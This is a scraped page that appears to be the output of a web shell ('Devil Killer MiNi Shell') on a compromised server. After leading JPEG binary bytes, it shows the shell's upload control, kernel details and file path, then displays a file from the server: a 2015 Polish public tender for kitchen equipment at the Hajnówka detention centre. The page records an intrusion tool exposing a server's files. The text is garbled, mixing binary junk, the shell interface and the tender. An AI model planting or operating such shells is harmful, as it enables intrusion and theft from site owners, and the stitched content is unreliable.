JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150826/126303-N-2015.html

<p class="kh_header"><b>Czarne: Dostawa i montaż wyposażenia gastronomicznego na potrzeby kuchni Aresztu Śledczego w Hajnówce, ul. Warszawska 67, 17-200  Hajnówka.</b><br>
<b>Numer ogłoszenia: 126303 - 2015; data zamieszczenia: 26.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorska Instytucja Gospodarki Budżetowej "POMERANIA" , ul. Pomorska 1, 77-330 Czarne, woj. pomorskie, tel. 59 833 36 79, faks 59 833 24 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pigbzamowieniapubliczne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wyposażenia gastronomicznego na potrzeby kuchni Aresztu Śledczego w Hajnówce, ul. Warszawska 67, 17-200  Hajnówka..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest Dostawa i montaż wyposażenia gastronomicznego na potrzeby kuchni Aresztu Śledczego w Hajnówce, ul. Warszawska 67, 17-200  Hajnówka. 
3.2.	Szczegółowy opis przedmiotu zamówienia wyszczególniony w tabeli poniżej zawiera wykazy asortymentowo ilościowe, nazwę rodzaju wyposażenia, jego ilość wraz z opisem wymaganych parametrów z zastrzeżeniem postanowień pkt 2.26 SIWZ. 

L.p.	Ilość	Opis urządzeń	Wymiary 
(Szer. x Głęb. x Wys. mm)	Zasilanie elektr. (V/kW)
				
				[ kW ]	[ V ]
 	 	PARTER	 	 	 	 	 
1.	2	Regał magazynowy z 4 półkami stałymi np. typ MR1A-100DS lub równoważny	1000	600	1800	 	 
1A	1	Regał magazynowy z 4 półkami stałymi np. typ MR1A-100DS lub równoważny	1100	600	1800	 	 
3.	1	Basen h=400 np.. Typ ZDA0X00X-080EK lub równoważny	800	700	850	 	 
 	1	bateria z wyciąganą wylewką np. 6492.90 Echterman lub równoważna	 	 	 	 	 
4.	1	Regał ociekowy z 5 półkami, w tym 3 przestawne np. typ MR2B-120ES lub równoważny	1200	700	1800	 	 
4A	1	Regał ociekowy z 5 półkami, w tym 3 przestawne np. typ MR2C-130ES lub równoważny	1300	700	1800	 	 
4B	2	Regał ociekowy z 5 półkami, w tym 3 przestawne np.. Typ MR2C-120DS lub równoważny	1200	600	1800	 	 
4C	1	Regał ociekowy z 5 półkami, w tym 3 przestawne np. typ MR2C-130DS lub równoważny	1300	600	1800	 	 
6.	1	Basen na kółkach niski np. typ TZ51-072DK lub równoważny	720	600	620	 	 
7.	1	Stół ze zlewem 2 komorowym np. typ ZCA0X00X-130DK lub równoważny	1300	600	850	 	 
 	1	bateria z wyciąganą wylewką np. 6492.90 Echterman lub równoważna	 	 	 	 	 
8.	1	Stół z półką np. typ SPA1X0-140DK lub równoważny	1400	600	850	 	 
9.	1	Szafa chłodnicza nierdzewna 700l np. typ CMR1101-062GK lub równoważna	710	800	2025	0,55	230
10.	1	Stół ze zlewem 2 komorowym np. typ ZCA0X00X-130DK lub równoważny	1300	600	850	 	 
 	1	bateria sztorcowa np. typ AZ102 lub równoważna	 	 	 	 	 
11.	1	Naświetlacz UV do jaj np. typ PJU1100-040DK lub równoważny	360	530	245	0,10	230
12.	1	Stół z półką np. typ SPA1X0-140EK lub równoważny	1400	700	850	 	 
13.	1	Piec konwekcyjny10x1/1GN np. typ CM101E lub równoważny	847	771	1042	19,00	400
	1	Komplet pojemników GN -34 szt 
	 	 	 	 	 
14.	1	Podstawa pod piec np. typ UP61.2-084FK lub równoważna	845	725	700	 	 
15.	1	Basen h=400 np. typ ZDA0X00X-110EK lub równoważny	1100	700	850	 	 
16.	1	Regał ociekowy z 5 półkami, w tym 3 przestawne np. typ MR2C-100BS lub równoważny	1000	400	1800	 	 
16A	1	Regał ociekowy z 5 półkami, w tym 3 przestawne np. typ MR2C-110BS	1100	400	1800	 	 
18.	1	Bateria prysznicowa 1 kolumnowa z wylewką np. typ AZ113 lub równoważna	 	 	 	 	 
19.	1	Pojemnik na odpadki poj. 70L np. typ TU61-040BK lub równoważny	402	402	671	 	 
20.	3	Regał magazynowy z 4 półkami stałymi np. typ MR1A-100DS lub równoważny	1000	600	1800	 	 
21.	3	Lampa owadobójcza np. PZ16 ALU/M029031 lub równoważna	365	130	262	 	 
22.	1	Szafa chłodnicza np. typ BOLARUS S711 lub równoważna	740	860	2000	0,55	230
23.	1	Stół z drzwiami suwanymi np. KPASX0-120EK lub równoważny	1200	700	850	 	 
23A	1	Stół z półką np. typ SPA1X0-100EK lub równoważny	1000	700	850	 	 
25.	1	Stół ze zlewem 2 komorowym np. typ ZCA0X00X-120DK lub równoważny	1200	700	850	 	 
 	1	bateria sztorcowa np. typ AZ102 lub równoważna	 	 	 	 	 
27.	1	Stół jezdny z półką np. typ SPA1X0-100DK lub równoważny	1000	600	900	 	 
28.	1	Stół z półką np. typ SPA!Z0-140EK lub równoważny	1400	700	850	 	 
31.	1	Patelnia elektryczna np. typ PE41ZL lub równoważna	 	 	 	9,00	400
32.	1	Taboret elektryczny np. typ HET01-060DK lub równoważny	600	600	425	5,00	400
33.	1	Zestaw kociołków przechylnych, parowych (pojemność 3x30 l)	1000	500	200	 	 
34.	2	Kocioł parowy 300 l np.. typ GK313000-120KK_P2 lub równoważny	1200	1270	900	 	 
38.	1	Półka np. typ AM612-140AK lub równoważna	1400	300	200	 	 
39.	1	Zamrażarka skrzyniowa 390l np. typ Bolarus Z-40 lub równoważna	803	910	1200	1,00	230
39A	1	Zamrażarka skrzyniowa 600l np. typ Bolarus Z-67 lub równoważna	1700	803	910	1,00	230
40.	1	Szafa chłodnicza 700l np. Bolarus lub równoważna	 	 	 	0,50	230
41	1	Szafa chłodnicza nierdzewna 1400l np. typ CMF1101-140GK lub równoważna	1400	895	2040	1,00	230
42.	1	Chłodziarka nierdzewna, 350l np. typ HR-400/S lub równoważna	600	590	1850	0,30	230
48.	1	Wózek transportowy dwupółkowy np. typ TW06-111EK lub równoważny	860	540	920	 	 
 	 	PIWNICA	 	 	 	 	 
1	16	Paleta magazynowa np. typ K20010699 lub równoważna	1200	800	130	 	 
3	6	Regał magazynowy z 4 półkami stałymi np. typ MR1A-100DS lub równoważny	1000	600	1800	 	 
3A	5	Regał magazynowy z 4 półkami stałymi np. typ MR1A-100DS lub równoważny	1000	600	1800	 	 
3B	3	Regał magazynowy z 4 półkami stałymi np. typ MR1A-110DS lub równoważny	1100	600	1800	 	 
5	1	Regał magazynowy z 4 półkami stałymi np. typ MR1A-090CS lub równoważny	900	500	1800	 	 
5A	3	Regał magazynowy z 4 półkami stałymi np. typ MR1A-090BS lub równoważny	900	400	1800	 	 
	1	Agregat typu Split w obudowie z rurami do 10m i z opcją zimową do komory chłodniczej	700	490	380	1,20	230
7	1	Komora chłodnicza, bezzamkowa, malowana, na panelu U, panel 80 mm, wym. wew 2510x2120 mm	2720	2330	2300	2,50	400
7A	2	Regał dodatkowy np. typ F004295 lub równoważny	1233	555	1750	 	 
7B	2	Regał podstawowy np. typ F004275 lub równoważny	1265	555	1750	 	 
7C	1	Regał dodatkowy np. typ F004292 lub równoważny	905	555	1750	 	 
7C	1	Regał dodatkowy np. typ F004292 lub równoważny	905	555	1750	 	 
8	2	Waga elektroniczna pomostowa np. typ M006065 Rubin 150 lub równoważna	400	500	815	 	 
11	6	Szafa ubraniowa, komora szafy podzielona na dwa przedziały np. Sum 420 st lub równoważna	800	490	1800	 	 
12	1	Szafa mroźnicza nierdzewna  700l	700	895	2040	1,00	230
3.3.	 Przed planowaną dostawą wykonawca przedstawi wzór mebli i kolorystykę do akceptacji Zamawiającego. 
3.4.	  Pomieszczenia kuchenne będą posiadały instalację elektryczną oraz niezbędne przyłącza wod-kan do poszczególnych urządzeń. 
3.5.	Wykonawca zobowiązany jest do dostarczenia i montażu takich urządzeń i wyposażenia, których wymiary są ściśle określone poprzez usytuowanie urządzeń i wyposażenia ograniczonego ścianami i przestrzenią funkcjonalną montowanych urządzeń, które wynikają z tabeli  z pkt 3.2 i Załącznika nr 1 do SIWZ.
3.6.	  Ustawienie urządzeń i mebli będzie zgodne zgodnie z rysunkiem Technologii stanowiącym załącznik nr  1 do SIWZ. 
3.7.	  Wszystkie oferowane meble, sprzęt AGD oraz urządzenia kuchenne muszą być fabrycznie nowe, nie używane, wyprodukowane nie wcześniej niż 12 miesięcy przed dostawą. 
3.8.	 Przed montażem sprzętu i urządzeń wykonawca przedłoży zamawiającemu: 
1)	opis urządzeń technicznych, 
2)	instrukcje obsługi w języku polskim, 
3)	dokumenty potwierdzające zgodność urządzeń z normami jakościowymi i specyfikacją. 
3.9.	Po montażu urządzeń ,Wykonawca zobowiązany jest dokonać rozruchu technologicznego zamontowanych urządzeń. 
3.10.	Przedmiot zamówienia obejmuje również przeprowadzenie szkolenia stanowiskowego w uzgodnieniu z Zamawiającym. 
3.11.	  Wykonawca musi zapewnić i uwzględnić w cenie ryczałtowej w szczególności : 
1)	załadunek, 
2)	transport, 
3)	rozładunek dostarczonych urządzeń i mebli,
4)	montaż na miejscu wraz z przygotowaniem do użytkowania,
5)	ewentualną  naprawę uszkodzeń ścian, posadzek i instalacji powstałych w trakcie montażu, 
6)	posprzątanie pomieszczeń po montażu,
7)	wywóz opakowań,
8)	szkolenie pracowników Użytkownika.
3.12.	Zamawiający ma prawo reklamować przedmiot dostawy. 
3.13.	Termin płatności wynagrodzenia należnego Wykonawcy wynosi 30 dni od daty dostarczenia prawidłowo wystawionej faktury do siedziby Zamawiającego.
3.14.	Zamawiający nie przyjmie faktury, jeżeli zostaną zgłoszone jakiekolwiek zastrzeżenia do przedmiotu dostawy. 
3.15.	Wykonawca udzieli gwarancji na dostarczone urządzenia gwarancji nie krótszej niż gwarancja producenta, z tym zastrzeżeniem że okres gwarancji i rękojmi na całość przedmiotu zamówienia nie może być krótszy niż 24 miesiące..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.	Wymagania dotyczące wadium
10.1.	Na podstawie art. 45 ust. 1 ustawy Zamawiający żąda od wykonawców wniesienia wadium. 
10.2.	Wadium należy wnieść przed upływem terminu składania ofert w kwocie: 2 000 zł  (słownie: dwa tysiące złotych  ) 
10.3.	Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy zostanie uznany kwotą wadium przed upływem terminu składania ofert. 
10.4.	Nie wniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie wykonawcy z postępowania. 
10.5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego 86 1130 1121 0006 5624 2990 0001  z dopiskiem - wadium - numer sprawy: ZP/41/CzB- HA/2015 .
10.6.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). 
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
10.7.	W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń musi wynikać bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego (beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego kwoty wadium w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 46 ust. 4 a i ust. 5 ustawy. 
10.8.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
10.9.	Wraz z ofertą należy złożyć stosowne dokumenty: 
1) oryginały dokumentów w przypadku wnoszenia wadium w jednej z form, o których mowa w art. 45 ust. 6 pkt 2-5 ustawy, 
2) w przypadku wniesienia wadium w pieniądzu wskazane jest złożenie kserokopii dowodu jego wniesienia. 
10.10.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
10.11.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
10.12.	 Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
10.13.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. 
10.14.	Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
10.15.	 Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
10.16.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli: 
1) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy , z przyczyn leżących po jego stronie, nie złożył:
a) dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, 
b) pełnomocnictw, 
c) listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy  lub informacji o tym, że nie należy do grupy kapitałowej, 
d)  nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej; 
2) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
3) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
4) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wymaganego doświadczenia i wiedzy wykonawca przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw , w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający, że   wykonał co najmniej  2 ( dwie  ) dostawy wraz montażem urządzeń i wyposażenia kuchennego na kwotę nie mniejszą niż  200 000 zł brutto ( dwieście tysięcy )  wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocenę spełniania tego warunku Zamawiający dokona przy użyciu formuły spełnia- nie spełnia na podstawie złożonego oświadczenia zawartego w formularzu ofertowym załącznik A do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
